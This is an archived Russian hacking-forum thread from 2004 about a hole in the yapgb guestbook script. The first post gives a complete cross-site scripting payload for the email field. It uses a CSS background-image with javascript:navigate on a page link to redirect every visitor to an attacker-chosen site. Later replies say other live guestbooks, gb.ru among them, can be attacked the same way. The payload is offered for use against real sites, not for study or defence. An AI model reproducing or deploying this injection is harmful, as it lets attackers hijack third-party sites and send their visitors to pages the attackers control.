PDA

Просмотр полной версии : Уязвимость гостевой книги  yapgb


Егорыч+++
14.05.2004, 11:24
Эта гостевая не пропускает " ' ,а также не пропускает < >.
Но тем неменее редирекс сделать можно. Для этого отсчитываем какая ссылка по счету у нас будет в homepage.
потом в поле почты вставляем следующий код:

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">de@de.de" style=background-image:url(javascript:navigate(document.links[7].hr ef));[/QUOTE]<span id='postcolor'>

в поле HOMEPAGE адрес нашей странички http://antichat.ru

Здесь 7 - это порядковый на страничке (если не получается посчитать можно угадать)

ПОсле чего получаем редирект на АНТИЧАТ

Официальный сайт гостевой http://www.hewop.com/~yapgb/ - но там в демоверсии какой то глюк и они подменяют все точки и разные символы.. из за чего у них ссылки неправильно отображаются. Зато уязвимость есть во всем остальных гостевых найденных в интернете.

JazzzSummerMan
14.05.2004, 16:37
Вот это то что нужно! Многие гостевые можно взломать только таким способом( через htmtl рассматривая ясен), например gb.ru, по мойму то же самое)

Егорыч+++
14.05.2004, 16:55
JazzzSummerMan - поздравляю.. gb.ru действительно так ломается

Егорыч+++
14.05.2004, 20:20
кавычки экранируются...